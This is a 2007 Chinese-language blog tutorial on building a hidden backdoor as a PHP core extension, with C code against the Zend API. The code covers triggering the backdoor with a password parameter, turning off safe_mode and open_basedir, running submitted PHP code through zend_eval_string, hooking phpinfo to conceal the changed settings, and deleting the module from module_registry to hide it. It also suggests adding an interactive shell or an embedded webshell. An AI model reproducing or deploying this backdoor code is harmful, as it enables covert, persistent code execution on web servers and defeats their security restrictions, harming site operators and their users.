Developing A PHP Core Backdoor

Published on 2007 - 05 - 23

Author: wofeiwo/GaRY <wofeiwo_at_gmail_dot_com>


目录

1)前言
2)优缺点
3)设计
4)功能实现
5)参考文档
6)一些说明


1)前言

PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现.由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor.而且php支持使用dl函数动态加载模块的技术,这种类似linux等系统上的LKM机制让我们的Backdoor可以更轻松的加载.本文就简单介绍下修改PHP内核的Backdoor的实现.

2)优缺点

优点:

1. 众所周知,PHP是一个跨平台的脚本语言,所以php Backdoor也可以很方便得跨平台.当然这必须要求你尽量使用C库或者使用php内核中提供的API来编写代码.而尽量少用系统API.不过这总比ring0下的Backdoor什么都要自己实现要好.
2. 由于PHP与客户端的通讯是通过http协议实现的.所以也不用担心端口隐藏,进程隐藏等问题.
3. 加载方便.你可以通过设置php.ini或者使用dl函数来加载你的Backdoor.或者,如果你愿意的话你可以把Backdoor编译到php里去.
4. 配合webshell使用,用Backdoor配置php环境,让webshell突破disable fuction,safe_mode,open_basedir等限制.

缺点:

1. 权限低.Backdoor的权限完全取决于web server程序的权限.必须与其他工具配合使用以得到高权限.
2. 基于php,只是一个ring3下的Backdoor,所以不能太底层,很多功能都受到限制.

3)设计:

我们这里做为一个例子,设计了个简单的php Backdoor,它主要实现了几个功能:

1. 通过过滤用户提交的特定变量来启动Backdoor.
2. 修改php环境变量.为webshell提供宽松的执行环境.
3. 直接执行用户提交的php代码.
4. 隐藏自身.

4)功能实现

前置知识:
要编写php Backdoor,必须先了解php module的编写技术.这个内容超出本文的范围,读者可以看下本文最后列出的参考文档.并且最好先查看以下文件以熟悉php内核的API.

php-src/main/php.h, 位于PHP 主目录。这个文件包含了绝大部分 PHP 宏及 API 定义。
php-src/Zend/zend.h, 位于 Zend 主目录。这个文件包含了绝大部分 Zend 宏及 API 定义。
php-src/Zend/zend_API.h, 也位于 Zend 主目录,包含了Zend API 的定义。

以下的结构体,定义了一个PHP Backdoor模块的基本信息:

zend_module_entry wfw_module_entry = {
STANDARD_MODULE_HEADER
,
"wfw", //模块名
wfw_functions, //导出函数结构体
PHP_MINIT(wfw), //模块初始化
PHP_MSHUTDOWN(wfw), //模块清理
PHP_RINIT(wfw), //运行时初始化
PHP_RSHUTDOWN(wfw), //运行时清理
PHP_MINFO(wfw), //处理phpinfo中的模块信息
"0.1", //模块版本
STANDARD_MODULE_PROPERTIES
};


在php生命周期中,ZendEngine首先要初始化module,每个module中定义的PHP_MINIT_FUNCTION函数作为初始化代码(ModuleInit)都会被执行一次,而PHP_RINIT_FUNCTION函数则是在每次页面被请求的时候(RuntimeInit)都会执行一次.因此对php函数的hook,设置php环境变量,对user input的过滤,都可以根据需要在这两个函数中进行.然后在PHP_MSHUTDOWN_FUNCTION和PHP_RSHUTDOWN_FUNCTION中进行相应的清理.而作为Backdoor,PHP_MINFO_FUNCTION函数对我们则没什么必要,可以把这里设置为NULL.

当然会了php api还不够,再配合各系统上提供的api,并通过宏定义区分以跨平台.一个backdoor是很容易编出来的.在本文中我不会直接说明每个功能的实现,这些在所有ring3后门中都大同小异.我只说明些在PHP core环境下需要注意的部分.

过滤变量:
要过滤web server传递过来的变量,这有两种办法,一种是通过修改SAPI的input_filter,或者是treat_data.你可以是hook后再执行php的原始代码,也可以直接替换原始函数:

//
//函数原型如下:
//unsigned int input_filter(int arg, char *var, char **val, unsigned int val_len, unsigned int *new_val_len TSRMLS_DC)
//arg可以是PARSE_POST,PARSE_GET,PARSE_COOKIE,PARSE_STRING,PARSE_ENV等值,表示此变量是通过什么方式传递进来的.
//var,val分别是变量名和变量值
//

SAPI_API SAPI_INPUT_FILTER_FUNC(wfw_input_filter)
{
if(new_val_len) *new_val_len = val_len;

////////////////////////////////////////////////////////
//以上是原php中处理的代码,下面则是我添加的.

////////////////////////////////////////////////////////
if(strcmp(var,"pw") == 0 || strcmp(*val,"password") == 0)
dosomething();
////////////////////////////////////////////////////////
return SUCESS;
}

void wfw_hook_input_filter()
{
sapi_register_input_filter(wfw_input_filter);
//注册为input_filter
}

另外一种是直接从php内建的数组里获取变量:

int find_var()
{
zval
**array, **data;

TSRMLS_FETCH();

//查找_GET数组
if(SUCCESS != zend_symtable_find(&EG(symbol_table), "_GET", strlen("_GET")+1, (void **)&array))
{
return FAILURE;
}
//查找pw变量
if(SUCCESS != zend_symtable_find(HASH_OF(*array), "pw", strlen("pw")+1, (void **)&data))
{
return FAILURE;
}
// 比对pw变量值,是密码,则执行我们的代码.
if(strcmp(Z_STRVAL_PP(data),"password") == 0)
dosomething();
return SUCCESS;
}

使用那一种方式就看你的要求了.第一种可以直接获得用户提交的原始数据,如果你要在这里做处理或者filter,可以使用这种方法,一般没有特殊要求,使用第二种方法就可以了.

设置环境:
只要修改每次RINIT时候的ini设置,就可以了,我们使用ZEND API: zend_alter_ini_entry就可以实现这个功能:

zend_alter_ini_entry("safe_mode", sizeof("safe_mode"), "0", sizeof("0") - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);

执行用户提交的代码:
过滤web server传递过来的变量,并用以下函数执行即可:

int run_user_code(char *str)
{
int result;
zval retval_ptr;
result
= zend_eval_string(str, &retval_ptr, string_name TSRMLS_CC);
convert_to_string(retval_ptr);
php_printf(
"%s\r\n", Z_STRVAL(zval));
return result;
}

Hook函数:
Hook函数有不同方式,根据需要Hook函数类型的不同而不同,比如我想要替换phpinfo这个php语言内建函数,只需要这么做:

//注册新函数结构体
zend_function_entry hooked_functions[] = {
PHP_NAMED_FE(
phpinfo, PHP_FN(hooked_phpinfo), NULL) //注册为phpinfo的别名
{NULL, NULL, NULL} /* Must be the last line in wfw_functions[] */
};

void hook_fuctions(void)
{
TSRMLS_FETCH();

/* 替换函数 */
zend_hash_del(CG(function_table)
, "phpinfo", sizeof("phpinfo")); //从completer global里删除phpinfo函数
//注册新函数

#
ifndef ZEND_ENGINE_2
zend_register_functions(hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#else
zend_register_functions(NULL, hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
}

//新函数
PHP_FUNCTION(hooked_phpinfo)
{
..
}
/* {{{ PHP_MINIT_FUNCTION
*/
PHP_MINIT_FUNCTION(wfwcbd)
{
hook_fuctions();



return SUCCESS;
}

但是如果想要替换的是php内核的底层api,恐怕就需要使用到其他ring3 hook技术了.inline hook等.但幸好backdoor加载进php内核后和其他api是在同一进程上下文中的,所以查找函数地址也就比较方便.相信也不难实现,但是本文写作过程中并没有测试,有意的朋友可以自己尝试下.

隐藏:
这里所谓的隐藏并不是隐藏我们的文件,而是让我们的Backdoor module在php中不可见.具体做法是让我们的module注册为zend extension,而在module_registry中删除自身.这样get_loaded_extensions也就找不到我们模块的信息了.zend_extension结构体定义如下:

struct _zend_extension {
char
*name;
char
*version;
char
*author;
char
*URL;
char
*copyright;

startup_func_t startup;
//相当于MINIT
shutdown_func_t shutdown; //相当于MSHUTDOWN
activate_func_t activate; //相当于RINIT
deactivate_func_t deactivate; //相当于RSHUTDOWN

message_handler_func_t message_handler;

op_array_handler_func_t op_array_handler;

statement_handler_func_t statement_handler;
fcall_begin_handler_func_t fcall_begin_handler;
fcall_end_handler_func_t fcall_end_handler;

op_array_ctor_func_t op_array_ctor;
op_array_dtor_func_t op_array_dtor;

int (
*api_no_check)(int api_no);
void
*reserved2;
void
*reserved3;
void
*reserved4;
void
*reserved5;
void
*reserved6;
void
*reserved7;
void
*reserved8;

DL_HANDLE handle;
int resource_number;
};

实现代码如下:

#include "zend_extensions.h"

static zend_llist_position lp = NULL;
static void wfw_op_array_ctor(zend_op_array *op_array);
static void wfw_op_array_dtor(zend_op_array *op_array);
static int (*old_startup)(zend_extension *extension) = NULL;
static zend_extension *ze = NULL;
static int wfw_module_startup(zend_extension *extension);
static void wfw_module_active(void);
static void wfw_module_deactive(void);
static void wfw_shutdown(zend_extension *extension);
static int wfw_startup_wrapper(zend_extension *ext);


static zend_extension wfw_zend_extension_entry = {
"wfwcbd",
"0.1",
"wfw PHP Core BackDoor",
"http://www.phpweblog.net/GaRY",
"(C) Copyright 2007",

wfw_module_startup
,
wfw_shutdown
,
wfw_module_active
,
wfw_module_deactive
,
NULL,
NULL,
NULL,
NULL,
NULL,
wfw_op_array_ctor
,
wfw_op_array_dtor
,

STANDARD_ZEND_EXTENSION_PROPERTIES
};


/* {{{ wfw_functions[]
*
* Every user visible function must have an entry in wfw_functions[].
*/
zend_function_entry wfw_functions[]
= {
PHP_FE(your_ext_function
, NULL)
..
..
{
NULL, NULL, NULL} /* Must be the last line in wfw_functions[] */
};
/* }}} */

zend_module_entry phper_module_entry
= {
#if ZEND_MODULE_API_NO >= 20010901
STANDARD_MODULE_HEADER,
#endif
"phper",
NULL,
PHP_MINIT(phper)
,
NULL, // PHP_MSHUTDOWN(phper), //同时我们这里也就不需要以下函数了.全部替换为NULL,用zend extension里的同功能函数代替
NULL, // PHP_RINIT(phper),
NULL, // PHP_RSHUTDOWN(phper),
NULL, // PHP_MINFO(phper),
#
if ZEND_MODULE_API_NO >= 20010901
"0.1", /* Replace with version number for your extension */
#endif
STANDARD_MODULE_PROPERTIES
};

static void wfw_op_array_ctor(zend_op_array *op_array)
{
}

static void wfw_op_array_dtor(zend_op_array *op_array)
{
if (wfw_zend_extension_entry.resource_number != -1) {
op_array
->reserved[wfw_zend_extension_entry.resource_number] = NULL;
}
}

static int wfw_startup_wrapper(zend_extension *ext)
{
int res;
php_printf(
"php startup_wrapper\r\n");
ze
->startup = old_startup;
res
= old_startup(ext);
wfw_module_startup(
NULL);

return res;
}

static int wfw_module_startup(zend_extension *extension)
{
zend_module_entry
*module_entry_ptr;
int resid;
TSRMLS_FETCH();

php_printf(
"php_startup\r\n");
#ifndef ZEND_ENGINE_2
zend_register_functions(wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#else
zend_register_functions(NULL, wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
if (zend_hash_find(&module_registry, "wfwcbd", sizeof("wfwcbd"), (void **)&module_entry_ptr)==SUCCESS) {

if (extension) {
extension
->handle = module_entry_ptr->handle;
}
else {
zend_extension ext;
ext
= wfw_zend_extension_entry;
ext
.handle = module_entry_ptr->handle;
zend_llist_add_element(
&zend_extensions, &ext);
extension
= zend_llist_get_last(&zend_extensions);
}
module_entry_ptr
->handle = NULL;
//
//删除module_registry中的信息
//

if(SUCCESS != zend_hash_del(&module_registry, "wfwcbd", sizeof("wfwcbd"))) return FAILURE;

}
else {
return FAILURE;
}

resid
= zend_get_resource_handle(extension);
wfw_zend_extension_entry
.resource_number = resid;

return SUCCESS;
}

static void wfw_module_active()
{
//php_printf("wfw active!\r\n");
do_something_while_active();
}
static void wfw_module_deactive()
{
//php_printf("wfw deactive!\r\n");
do_something_while_deactive();
}
static void wfw_shutdown(zend_extension *extension)
{
//php_printf("wfw shutdown\r\n");
do_something_while_shutdown();
}

再配合hook phpinfo等函数,就可以让我们对php环境变量做的修改看不出来:

PHP_FUNCTION(hooked_phpinfo)
{
int argc
= ZEND_NUM_ARGS();
long flag;

//恢复设置
zend_alter_ini_entry("safe_mode", sizeof("safe_mode"),
old_safe_mode
, sizeof(old_safe_mode) - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
zend_alter_ini_entry(
"open_basedir", sizeof("open_basedir"),
old_open_basedir
, sizeof(old_open_basedir) - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);



if (zend_parse_parameters(argc TSRMLS_CC, "|l", &flag) == FAILURE) {
return;
}

if(!argc) {
flag
= PHP_INFO_ALL;
}

php_start_ob_buffer(
NULL, 4096, 0 TSRMLS_CC);
php_print_info(flag TSRMLS_CC);
php_end_ob_buffer(
1, 0 TSRMLS_CC);

//重新设置环境
zend_alter_ini_entry("safe_mode", sizeof("safe_mode"),
"0", sizeof("0") - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
zend_alter_ini_entry(
"open_basedir", sizeof("open_basedir"),
"", sizeof("") - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
..
..

RETURN_TRUE;
}

使用以上所述的方法,基本一个简单的PHP core backdoor就可以实现了.当然,我们其实还可以加入些其他功能.比如通过控制http头提供个可交互shell,比如内嵌一个php webshell在module中,触发后用php_start_ob_buffer函数及php_end_ob_buffer控制输出,替代任何一个php文件的输出为我们的webshell....
开阔你的大脑吧.一切都由你的想像力来完成:)

5)一些说明

很久没有写文档了,文章比较乱.请各位包涵吧.我的语文水平也就那么点了:)
由于对于php core的研究我也是新手,以上文章难免失误,请各位指正,我的email: wofeiwo_at_gmail_dot_com
最后感谢下Ben.yan在本文写作过程中对我的极大帮助.没有他本文是完不成的

6)参考文档

PHP手册: http://www.php.net/manual/en/
PHP源代码: http://www.php.net/
suhosin源代码: http://www.suhosin.org/
php win32执行程序module: http://www.phpweblog.net/GaRY/archive/2007/05/15/php_win32_create_process_module.html

Comments
Write a Comment